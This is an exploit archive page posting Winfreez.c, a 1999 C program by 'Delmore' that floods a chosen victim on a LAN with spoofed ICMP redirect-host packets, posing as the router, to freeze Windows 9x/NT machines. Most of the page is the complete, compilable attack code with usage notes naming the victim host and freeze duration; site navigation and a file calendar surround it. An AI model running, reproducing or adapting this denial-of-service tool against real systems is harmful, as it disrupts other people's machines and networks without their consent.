what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Winfreez.c

Winfreez.c
Posted Aug 17, 1999
Authored by Delmore

Winfreez is an exploit that creates an ICMP/Redirect-host message storm that freezes Win9x/NT(sp4) machines.

tags | exploit
systems | windows
SHA-256 | 5037816a3c126dae065cfc709e33a705c5592b639d0c4071bd8d20178c2aa40b

Winfreez.c

Change Mirror Download
/*
WinFreez.c by Delmore <delmore@moscowmail.com>

ICMP/Redirect-host message storm freeze Win9x/NT(sp4) box
in LAN.

Usage: winfreez sendtoip sendfromip time
where <sendtoip> is victim host, <sendfromip> is router
for victim host, <time> is time in seconds to freeze victim.

Note:
I've written small exploit for freeze win9x/nt boxes in LAN.
Proggy initiates ICMP/Redirect-host messages storm from router
(use router ip). Windows will receive redirect-host messages
and change own route table, therefore it will be frozen
or slowly working during this time.

On victim machine route table changes viewing with:
ROUTE PRINT
command in ms-dos box.

Exploit show different result for different system configuration.

System results:

p200/16ram/win95osr2 is slowly execute application
after 20 seconds of storm.

p233/96ram/nt4-sp4 is slowly working after 30
seconds of storm.

p2-266/64ram/win95 working slowly and can't normal execute
application.


Compiled on RedHat Linux 5, Kernel 2.0.35 (x86)
gcc ./winfreez.c -o winfreez

--- for Slackware Linux, Kernel 2.0.30
If you can't compile due to ip_sum not defined errors,
replace (line 207):
ip->ip_sum = 0;
to line:
ip->ip_csum = 0;
---

Soldiers Of Satan group
Russia, Moscow State University, 05 march 1999
http://sos.nanko.ru

Thanx to Mark Henderson.

*/

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>

/*
* Structure of an icmp header (from sparc header).
*/

struct icmp {
u_char icmp_type; /* type of message, see below */
u_char icmp_code; /* type sub code */
u_short icmp_cksum; /* ones complement cksum of struct */

union {
u_char ih_pptr; /* ICMP_PARAMPROB */
struct in_addr ih_gwaddr; /* ICMP_REDIRECT */
struct ih_idseq {
n_short icd_id;
n_short icd_seq;
} ih_idseq;

int ih_void;
} icmp_hun;

#define icmp_pptr icmp_hun.ih_pptr
#define icmp_gwaddr icmp_hun.ih_gwaddr
#define icmp_id icmp_hun.ih_idseq.icd_id
#define icmp_seq icmp_hun.ih_idseq.icd_seq
#define icmp_void icmp_hun.ih_void

union {
struct id_ts {
n_time its_otime;
n_time its_rtime;
n_time its_ttime;
} id_ts;

struct id_ip {
struct ip idi_ip;
/* options and then 64 bits of data */
} id_ip;

u_long id_mask;
char id_data[1];
} icmp_dun;

#define icmp_otime icmp_dun.id_ts.its_otime
#define icmp_rtime icmp_dun.id_ts.its_rtime
#define icmp_ttime icmp_dun.id_ts.its_ttime
#define icmp_ip icmp_dun.id_ip.idi_ip
#define icmp_mask icmp_dun.id_mask
#define icmp_data icmp_dun.id_data

};


u_short in_cksum (u_short *addr, int len);
void attack( char *sendtoip, char *sendfromip, time_t wtime, int s );


void main (int argc, char **argv)
{
time_t wtime;
char *sendtoip, *sendfromip;
int s, on;

if (argc != 4)
{
fprintf (stderr, "usage: %s sendto sendfrom time\n", argv[0]);
exit (1);
}

sendtoip = (char *)malloc(strlen(argv[1]) + 1);
strcpy(sendtoip, argv[1]);

sendfromip = (char *)malloc(strlen(argv[2]) + 1);
strcpy(sendfromip, argv[2]);

wtime = atol(argv[3]);

if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
fprintf (stderr, "socket creation error\n" );
exit (1);
}

#ifdef IP_HDRINCL
if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, &on, sizeof (on)) < 0)
{
fprintf (stderr, "sockopt IP_HDRINCL error\n" );
exit (1);
}
#endif

printf("winfreez by Delmore, <delmore@moscowmail.com>\n");
printf("Soldiers Of Satan group, http://sos.nanko.ru\n\n");
printf("sendto = %s\n", sendtoip);
printf("sendfrom = %s\n", sendfromip);
printf("time = %i s\n", wtime);

attack( sendtoip, sendfromip, wtime, s );

free( (void *) sendtoip );
free( (void *) sendfromip );
}


void attack( char *sendtoip, char *sendfromip, time_t wtime, int s )
{
time_t curtime, endtime;
int i1, i2, i3, i4;
char redir[21];
char buf[100];
struct ip *ip = (struct ip *) buf;
struct icmp *icmp = (struct icmp *) (ip + 1);
struct hostent *hp;
struct sockaddr_in dst;

if(wtime==0) return;

if ((hp = gethostbyname (sendtoip)) == NULL)
if ((ip->ip_dst.s_addr = inet_addr (sendtoip)) == -1)
{
fprintf (stderr, "%s: unknown sendto\n", sendtoip);
exit (1);
}

if ((hp = gethostbyname (sendfromip)) == NULL)
if ((ip->ip_src.s_addr = inet_addr (sendfromip)) == -1)
{
fprintf (stderr, "%s: unknown sendfrom\n", sendfromip);
exit (1);
}

endtime = time(NULL) + wtime;

srand((unsigned int) endtime);

do {
bzero (buf, sizeof buf);

/* sendto/gateway */
hp = gethostbyname (sendtoip);
bcopy (hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
bcopy (hp->h_addr_list[0], &icmp->icmp_gwaddr.s_addr, hp->h_length);

/* sendfrom */
hp = gethostbyname (sendfromip);
bcopy (hp->h_addr_list[0], &ip->ip_src.s_addr, hp->h_length);

/* generate redirect*/
i1 = 1+(int) (223.0*rand()/(RAND_MAX+1.0));
i2 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));
i3 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));
i4 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));

bzero (redir, sizeof redir);
sprintf(redir,"%u.%u.%u.%u", i4, i3, i2, i1 );

hp = gethostbyname (redir);
bcopy (hp->h_addr_list[0], &icmp->icmp_ip.ip_dst.s_addr, hp->h_length);

ip->ip_v = 4;
ip->ip_hl = sizeof *ip >> 2;
ip->ip_tos = 0;
ip->ip_len = htons (sizeof buf);
ip->ip_id = htons (4321);
ip->ip_off = 0;
ip->ip_ttl = 255;
ip->ip_p = 1;
ip->ip_sum = 0; /* kernel fills this in */

bcopy (&ip->ip_dst.s_addr, &icmp->icmp_ip.ip_src.s_addr, sizeof(ip->ip_dst.s_addr));
icmp->icmp_ip.ip_v = 4;
icmp->icmp_ip.ip_hl = sizeof *ip >> 2;
icmp->icmp_ip.ip_tos = 0;
icmp->icmp_ip.ip_len = htons (100); /* doesn't matter much */
icmp->icmp_ip.ip_id = htons (3722);
icmp->icmp_ip.ip_off = 0;
icmp->icmp_ip.ip_ttl = 254;
icmp->icmp_ip.ip_p = 1;
icmp->icmp_ip.ip_sum = in_cksum ((u_short *) & icmp->icmp_ip, sizeof *ip);

dst.sin_addr = ip->ip_dst;
dst.sin_family = AF_INET;

icmp->icmp_type = ICMP_REDIRECT;
icmp->icmp_code = 1; /* 1 - redirect host, 0 - redirect net */
icmp->icmp_cksum = in_cksum ((u_short *) icmp, sizeof (buf) - sizeof(*ip));

if( sendto( s, buf, sizeof buf, 0, (struct sockaddr *) &dst, sizeof dst) < 0 )
{
fprintf (stderr, "sendto error\n");
exit (1);
}

}while (time(NULL)!=endtime);
}

/*
* in_cksum -- Checksum routine for Internet Protocol family headers (C
* Version) - code from 4.4 BSD
*/
u_short in_cksum (u_short *addr, int len)
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;

/*
* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits.
*/
while (nleft > 1)
{
sum += *w++;
nleft -= 2;
}

/* mop up an odd byte, if necessary */
if (nleft == 1)
{
*(u_char *) (&answer) = *(u_char *) w;
sum += answer;
}
/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return (answer);
}

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close